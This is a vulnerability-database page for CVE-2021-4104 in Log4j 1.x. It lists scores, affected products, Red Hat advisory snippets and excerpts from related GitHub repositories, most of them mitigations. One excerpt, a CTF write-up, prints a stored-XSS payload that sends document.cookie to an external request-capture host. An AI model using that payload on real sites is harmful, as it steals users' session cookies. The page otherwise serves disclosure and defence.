Published: 14/12/2021 Updated: 22/12/2023

CVSS v2 Base Score: 6 | Impact Score: 6.4 | Exploitability Score: 6.8

CVSS v3 Base Score: 7.5 | Impact Score: 5.9 | Exploitability Score: 1.6

VMScore: 540

Vector: AV:N/AC:M/Au:S/C:P/I:P/A:P

A flaw was found in the Java logging library Apache Log4j in version 1.x . This allows a remote malicious user to execute code on the server if the deployed application is configured to use JMSAppender. This flaw has been filed for Log4j 1.x, the corresponding flaw information for Log4j 2.x is available at: access.redhat.com/security/cve/CVE-2021-44228 (CVE-2021-4104)

Vulnerable Product	Search on Vulmon	Subscribe to Product
apache log4j 1.2
fedoraproject fedora 35
redhat jboss operations network 3.0
redhat jboss a-mq 6.0.0
redhat enterprise linux 7.0
redhat enterprise linux 6.0
redhat jboss enterprise application platform 6.0.0
redhat jboss enterprise application platform 7.0
redhat jboss fuse 6.0.0
redhat jboss fuse service works 6.0
redhat jboss web server 3.0
redhat jboss data virtualization 6.0.0
redhat enterprise linux 8.0
redhat single sign-on 7.0
redhat software collections -
redhat jboss fuse 7.0.0
redhat process automation 7.0
redhat jboss data grid 7.0.0
redhat openshift application runtimes -
redhat codeready studio 12.0
redhat integration camel k -
redhat openshift container platform 4.6
redhat jboss a-mq 7
redhat openshift container platform 4.7
redhat integration camel quarkus -
redhat jboss a-mq streaming -
redhat openshift container platform 4.8
oracle weblogic server 12.2.1.3.0
oracle business intelligence 12.2.1.3.0
oracle business process management suite 12.2.1.3.0
oracle jdeveloper 12.2.1.3.0
oracle identity management suite 12.2.1.3.0
oracle business intelligence 12.2.1.4.0
oracle communications unified inventory management 7.3.4
oracle communications unified inventory management 7.3.5
oracle weblogic server 12.2.1.4.0
oracle weblogic server 14.1.1.0.0
oracle enterprise manager base platform 13.4.0.0
oracle communications network integrity 7.3.6
oracle business process management suite 12.2.1.4.0
oracle advanced supply chain planning 12.2
oracle advanced supply chain planning 12.1
oracle communications unified inventory management 7.4.1
oracle enterprise manager base platform 13.5.0.0
oracle healthcare data repository 8.1.0
oracle communications messaging server 8.1
oracle business intelligence 5.9.0.0.0
oracle communications eagle ftp table base retrieval 4.5
oracle retail extract transform and load 13.2.5
oracle utilities testing accelerator 6.0.0.2.2
oracle utilities testing accelerator 6.0.0.3.1
oracle utilities testing accelerator 6.0.0.1.1
oracle retail allocation 14.1.3.2
oracle retail allocation 15.0.3.1
oracle retail allocation 16.0.3
oracle retail allocation 19.0.1
oracle communications unified inventory management 7.4.2
oracle identity management suite 12.2.1.4.0
oracle financial services revenue management and billing analytics 2.7.0.0
oracle hyperion data relationship management
oracle financial services revenue management and billing analytics 2.8.0.0
oracle mysql enterprise monitor
oracle hyperion infrastructure technology
oracle tuxedo 12.2.2.0.0
oracle e-business suite cloud manager and cloud backup module 2.2.1.1.1
oracle financial services revenue management and billing analytics 2.7.0.1
oracle fusion middleware common libraries and tools 12.2.1.4.0
oracle communications offline mediation controller 12.0.0.5.0
oracle timesten grid -
oracle communications offline mediation controller
oracle stream analytics -
oracle goldengate -

A flaw was found in the Java logging library Apache Log4j in version 1x This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender This flaw has been filed for Log4j 1x, the corresponding flaw information for Log4j 2x is available at: accessredhatcom/security/cve/CVE-2021 ...

It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application (CVE-2017-5645) A flaw was discovere ...

Synopsis Moderate: Red Hat Single Sign-On 7410 security update Type/Severity Security Advisory: Moderate Topic A security update is now available for Red Hat Single Sign-On 74 from the Customer PortalRed Hat Product Security has rated this update as having a security impact of Moderate A Common Vulnerability Scoring System (CVSS) base sc ...

Synopsis Important: parfait:05 security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for the parfait:05 module is now available for Red Hat Enterprise Linux 82 Extended Update SupportRed Hat Produc ...

Synopsis Low: Red Hat JBoss Web Server 31 Service Pack 14 security update Type/Severity Security Advisory: Low Topic An update is now available for Red Hat JBoss Web Server 31 for Red Hat Enterprise Linux 7 and Microsoft WindowsRed Hat Product Security has rated this release as having a security impact of Low A Common Vulnerability Scorin ...

Synopsis Low: Red Hat JBoss Web Server 31 Service Pack 14 Security Update Type/Severity Security Advisory: Low Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update is now available for Red Hat JBoss Web Server 31 for Red Hat Enterprise Linux 7Red Hat Produ ...

Synopsis Important: Red Hat JBoss Data Virtualization 648SP1 security update Type/Severity Security Advisory: Important Topic An update is now available for Red Hat JBoss Data VirtualizationRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score, whic ...

Synopsis Important: Red Hat Data Grid 739 security update Type/Severity Security Advisory: Important Topic An update for Red Hat Data Grid is now availableRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, ...

Synopsis Moderate: Red Hat Single Sign-On 751 security update Type/Severity Security Advisory: Moderate Topic A security update is now available for Red Hat Single Sign-On 75 from the Customer PortalRed Hat Product Security has rated this update as having a security impact of Moderate A Common Vulnerability Scoring System (CVSS) base sco ...

Synopsis Important: Red Hat JBoss Fuse/A-MQ 63 R20 security and bug fix update Type/Severity Security Advisory: Important Topic An update is now available for Red Hat JBoss Fuse 63 and Red Hat JBoss A-MQ 63Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) ...

Synopsis Important: Red Hat JBoss Enterprise Application Platform 74 security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic A security update is now available for Red Hat JBoss Enterprise Application Platform 7 ...

Synopsis Important: Red Hat JBoss Enterprise Application Platform 74 security update Type/Severity Security Advisory: Important Topic A security update is now available for Red Hat JBoss Enterprise Application Platform 74Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring ...

Synopsis Moderate: Red Hat Single Sign-On 751 for OpenShift image security and enhancement update Type/Severity Security Advisory: Moderate Topic A new image is available for Red Hat Single Sign-On 751, running on OpenShift Container Platform 310 and 311, and 49Red Hat Product Security has rated this update as having a security impact ...

Synopsis Important: Red Hat Single Sign-On 751 security update on RHEL 8 Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic New Red Hat Single Sign-On 751 packages are now available for Red Hat Enterprise Linux 8Red Hat ...

Synopsis Important: Red Hat JBoss Enterprise Application Platform 64 security update Type/Severity Security Advisory: Important Topic An update is now available for Red Hat JBoss Enterprise Application Platform 64Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System ( ...

Synopsis Important: Red Hat Single Sign-On 751 security update on RHEL 7 Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic New Red Hat Single Sign-On 751 packages are now available for Red Hat Enterprise Linux 7Red Hat ...

Synopsis Low: RHV Manager (ovirt-engine) security update [ovirt-4410-1] Type/Severity Security Advisory: Low Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic Updated ovirt-engine packages that fix several bugs and add various enhancements are now availableRed Ha ...

Synopsis Important: Red Hat JBoss Data Virtualization 648SP2 security update Type/Severity Security Advisory: Important Topic An update is now available for Red Hat JBoss Data VirtualizationRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score, whic ...

Synopsis Important: Red Hat JBoss Enterprise Application Platform 6424 security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic A security update is now available for Red Hat JBoss Enterprise Application Platform ...

Synopsis Important: Red Hat JBoss Enterprise Application Platform 64 security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update is now available for Red Hat JBoss Enterprise Application Platform 64 for Re ...

Synopsis Moderate: Red Hat Fuse 7101 release and security update Type/Severity Security Advisory: Moderate Topic A minor version update (from 710 to 7101) is now available for Red Hat Fuse The purpose of this text-only errata is to inform you about the security issues fixed in this releaseRed Hat Product Security has rated this update ...

Synopsis Important: Red Hat JBoss Enterprise Application Platform 6424 security update Type/Severity Security Advisory: Important Topic A security update is now available for Red Hat JBoss Enterprise Application Platform 64 Red Hat Product Security has rated this update as having a security impact of ImportantA Common Vulnerability Scori ...

Synopsis Moderate: Red Hat Single Sign-On 7410 on OpenJDK for OpenShift image security update Type/Severity Security Advisory: Moderate Topic A new image is available for Red Hat Single Sign-On 7410 on OpenJDK, running on OpenShift Container Platform 310 and 311, and 43Red Hat Product Security has rated this update as having a securit ...

Synopsis Moderate: Red Hat Single Sign-On 7410 on OpenJ9 for OpenShift image security update Type/Severity Security Advisory: Moderate Topic A new image is available for Red Hat Single Sign-On 7410 on OpenJ9, running on OpenShift Container Platform 310 and 311, and 43Red Hat Product Security has rated this update as having a security ...

Synopsis Low: Red Hat JBoss Enterprise Application Platform 744 security update Type/Severity Security Advisory: Low Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic A security update is now available for Red Hat JBoss Enterprise Application Platform 74 for Red ...

Synopsis Low: Red Hat JBoss Enterprise Application Platform 744 security update Type/Severity Security Advisory: Low Topic A security update is now available for Red Hat JBoss Enterprise Application Platform 74Red Hat Product Security has rated this update as having a security impact of Low A Common Vulnerability Scoring System (CVSS) ba ...

Log4j version 1.2.17 without the offending class responsible for CVE-2021-4104.

Log4j version 1217-aims This jar was created to protect against CVE-2021-4104 It is meant to be used as a direct replacement for Log4j v1 libraries Log4j 12 project page: loggingapacheorg/log4j/12/ Apache 20 Licence: wwwapacheorg/licenses/LICENSE-20 Usage Add this to your pomxml <project > <repositories> &a

Apache POI for JPHP! WARNING this product use Log4J Package from maven (Apache Log4j Core » 2171) Vulnerabilities from dependencies: CVE-2021-42550 CVE-2021-4104 CVE-2021-23463 CVE-2019-17571

Python wrapper for JFROG Xray REST API

Python wrapper for JFROG Xray REST API jfrog-xray-api is a live python package for JFrog Xray REST API Tables of Contents Install Usage Authentication SYSTEM Create Bundle Ping Request Get Version Metrics Components Find Component by Name Find Components by CVEs Find CVEs by Components Get Component List Per Watch Get Artifact Dependency Graph Compare Artifacts Get

Root-me & CTFlearn Challenges

1 Web application vulnerabilities XSS Stored 1 Steps to reproduce - Create a free request capturer @ pipedreamcom - Start event listening at the request capturer - Visit challenge01root-meorg/web-client/ch18/ - Choose any title - Enter <script>documentwrite("<img src=request_capturer_url"+documentcookie+"/>");

Cloud open api SDK for customer system to synchronize related data

PAXSTORE Open API Java SDK Security Announcement This Open API SDK depends on log4j-127 It won't affected by the vulnerability CVE-2021-44228 But a similar vulnerability(CVE-2021-4104) is found in log4j 12x If the developer is not using JMSAppender it won't affected Also developer can remove JMSAppender using command(zip -q -d log4j-1217jar org/apache/log

Operational information regarding the log4shell vulnerabilities in the Log4j logging library.

Log4shell vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-4104, CVE-2021-45105) This repo contains operational information regarding the Log4shell vulnerability in the Log4j logging library Especially CVE-2021-44228 / CVE-2021-45046 and also covers CVE-2021-4104 / CVE-2021-45105 For additional information see: NCSC-NL advisory MITRE CSIRT network members advisories

assignments 期末作業 Apache Log4j漏洞班級：資財三乙學號：108AB0704 姓名：劉筑芸事件流程： 2021/11/24 Log4Shell 漏洞 (CVE-2021-44228)經由私下管道通報給Apache 2021/12/09 發布的 Log4j 2150 版當中已經修補。 Apache Log4j2 安全補丁更新過程： 2021/12/11 發布2150版本，對JNDI 查詢功能進行限制。但此版本�

Operational information regarding the log4shell vulnerabilities in the Log4j logging library.

PowerShell scripts for Log4Shell So far, it only includes the script Remove-ArchiveItemps1, which removes a specified class file from JAR files (or any ZIP file, for that matter) This allows to implement one of the proposed workarounds for the Log4Shell vulnerability found in Log4j 2X Java library (CVE-2021-44228 and CVE-2021-45046) The workaround consists in removing the o

Supplier Product Version (see Status) Status CVE-2021-4104 Status CVE-2021-44228 Status CVE-2021-45046 Status CVE-2021-45105 Notes Links Alphatron Alphatron Repeater Display MFS-VJ all Not vuln Not vuln Not vuln Not vuln Alphatron Alphatron Repeater Display MFS-VR all Not vuln Not vuln Not vuln Not vuln Alphatron Alphatron Repeater Display MFS all Not vuln Not vuln

Log4Shell (CVE-2021-44228): Descrizione, Exploitation e Mitigazione

CVE-2021-44228 Il 9 dicembre 2021 il mondo è venuto a conoscenza di una nuova falla di sicurezza riguardante Log4J Il punteggio CVSSv3 (Common Vulnerability Scoring System) della vulnerabilità, è stato valutato pari a 10, rendendola così di livello critico (nvdnistgov/vuln/detail/CVE-2021-44228) CVSSv3 Il suo vettore CVSSv3 è il

Mend Bulk Report Generator

Mend Bulk Report Generator CLI Tool to generate reports on multiple products or projects The tool allows including and excluding scopes by stating their tokens Report scope (-s, --ReportScope) determines whether reports run on projects or products If included scopes (via -i, --includedTokens) are not specified, the tool runs reports on all scopes Report data exported by de

Log4j fix This solution provides a fix for the following CVEs: CVE-2021-44228 CVE-2021-4104 CVE-2021-45046 Tthis script scans the systems by the following rules scans for all log4j*jar files in first part, scans for all potential Java Archive files and check if the log4j related stuff is embedded in Depending on founded version, it will remove the appropriate class from th

🐱‍💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks

🤝 Show your support - give a ⭐️ if you liked the content | SHARE on Twitter | Follow me on 🐱‍💻 ✂️ 🤬 LOG4J Java exploit - WAF and patches bypass tricks 📝 Description CVE-2021-44228 works on: log4j: 20 <= Apache log4j <= 2141 Java version already patched: 6u211+, 7u201+, 8u191+, 1101+ Windows Defender started to remove java f

CWE-502 https://www.cve.org/CVERecord?id=CVE-2021-44228 https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126 https://access.redhat.com/security/cve/CVE-2021-4104 https://www.kb.cert.org/vuls/id/930724 http://www.openwall.com/lists/oss-security/2022/01/18/3 https://www.oracle.com/security-alerts/cpujan2022.html https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0033 https://security.netapp.com/advisory/ntap-20211223-0007/https://www.oracle.com/security-alerts/cpuapr2022.html https://www.oracle.com/security-alerts/cpujul2022.html https://security.gentoo.org/glsa/202209-02 https://security.gentoo.org/glsa/202310-16 https://security.gentoo.org/glsa/202312-02 https://security.gentoo.org/glsa/202312-04 https://nvd.nist.gov https://alas.aws.amazon.com/AL2/ALAS-2022-1739.html https://github.com/open-AIMS/log4j

Get Started

CVE-2021-4104

Vulnerability Summary

Vulnerability Trend

Vendor Advisories

Github Repositories

References

Vulmon Search

About

Products

Connect